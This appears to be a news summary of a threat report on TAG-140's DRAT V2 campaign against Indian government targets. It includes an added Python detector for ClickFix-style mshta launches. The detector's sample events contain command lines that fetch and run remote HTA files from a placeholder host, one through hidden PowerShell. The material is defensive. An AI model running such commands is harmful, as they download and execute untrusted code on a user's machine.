A hacking group with links to Pakistani cyber operatives has been found targeting Indian government organizations using a modified version of a remote access trojan (RAT) known as DRAT. This activity is attributed to a threat actor named TAG-140, which is believed to be associated with the SideCopy hacking collective, a subgroup of the Transparent Tribe (or APT-C-56).
Recorded Future’s Insikt Group has noted that TAG-140 showcases a consistent evolution in its malware tactics and delivery methods. Their latest campaign involved spoofing the Indian Ministry of Defence with a fake press release portal, marking a significant shift in both the malware’s architecture and its command-and-control functionalities.
The newly updated RAT, referred to as DRAT V2, is part of SideCopy’s arsenal, which also includes various other RATs designed to attack both Windows and Linux systems. This attack emphasizes TAG-140’s ability to adapt their methods, using a diverse set of RAT malware to extract sensitive information while complicating detection and attribution efforts.
Targeting has broadened beyond traditional sectors, such as government and defense, now encompassing railways, oil and gas, and external affairs. Recorded Future details an infection method utilizing ClickFix-style techniques, which cleverly spoof the Indian Ministry of Defence’s site to deliver a modified version of DRAT.
The fraudulent site contains a single clickable link that initiates an infection process, copying malicious commands into the user’s clipboard to prompt execution. This leads to the retrieval of a malicious HTML Application (HTA) file from an external server, which launches a loader that facilitates additional infections and maintains persistence.
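The infection chain above (a pasted command that makes the host fetch and run a remote HTA file) leaves a recognisable footprint in process-creation telemetry: `mshta.exe` started with an `http(s)://` argument, often from an interactive parent such as `explorer.exe` rather than from a script host. The following is an added detection example written for this page, not code from Recorded Future or from the report it summarises; the log events are constructed Sysmon-style records, the URLs use the reserved `example.invalid` domain, and the field names (`image`, `parent_image`, `command_line`) are assumptions about how the telemetry is normalised.

```python
import json
import re
from typing import Dict, Iterable, List

# Constructed sample process-creation events in a simplified Sysmon-like shape.
# They are illustrative only, not telemetry captured from the campaign described above.
SAMPLE_EVENTS: List[dict] = [
    {"pid": 4120, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe https://example.invalid/press-release/update.hta"},
    {"pid": 4121, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
    {"pid": 4122, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe notes.txt"},
    {"pid": 4123, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell -w hidden -c "mshta http://example.invalid/a.hta"'},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
MSHTA_RE = re.compile(r"\bmshta(\.exe)?\b", re.IGNORECASE)
# Parents that indicate a user typed or pasted the command (Run dialog, Explorer)
# rather than a script or installer launching it.
INTERACTIVE_PARENTS = {"explorer.exe"}


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> List[str]:
    """Return the reasons an event looks like a remote-HTA (ClickFix-style) launch."""
    reasons: List[str] = []
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "")

    invokes_mshta = image == "mshta.exe" or MSHTA_RE.search(cmd) is not None
    fetches_remote = URL_RE.search(cmd) is not None

    if invokes_mshta and fetches_remote:
        reasons.append("mshta invoked with a remote URL (HTA fetched from external server)")
    if invokes_mshta and parent in INTERACTIVE_PARENTS:
        reasons.append("mshta launched from an interactive parent (pasted-command pattern)")
    return reasons


def detect(events: Iterable[dict]) -> Dict[int, List[str]]:
    """Map pid -> reasons for every event that triggers at least one rule."""
    hits: Dict[int, List[str]] = {}
    for event in events:
        reasons = score_event(event)
        if reasons:
            hits[event["pid"]] = reasons
    return hits


def parse_jsonl(text: str) -> List[dict]:
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

Only the two constructed events that combine `mshta` with a remote URL or an interactive parent are flagged; a locally sourced HTA started by an installer (`pid` 4121) is not, which is the distinction a triage rule needs to avoid drowning in benign `mshta` activity.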
DRAT V2 enhances its command capabilities, supporting arbitrary command executions while obfuscating command-and-control IP addresses. Unlike its predecessor, it opts for a simpler mechanism with most command headers remaining in plaintext, favoring effectiveness over stealth.
The trojan can carry out a range of functions on infected systems, from reconnaissance to data exfiltration, and supports both automated and manual post-exploitation activity without the need for auxiliary tools.
In addition to TAG-140, state-sponsored group APT36 has been active, especially amid ongoing India-Pakistan tensions, deploying Ares RAT against a variety of sectors. Meanwhile, a new Go-based malware variant called DISGOMOJI has emerged, showcasing evolving tactics by leveraging different communication methods for command-and-control operations.
The cyber espionage threat is bolstered by actors like Confucius, who are now deploying advanced stealer malware and modular backdoors, indicating a continuing trend of sophistication in cyberattacks targeting nations across South Asia.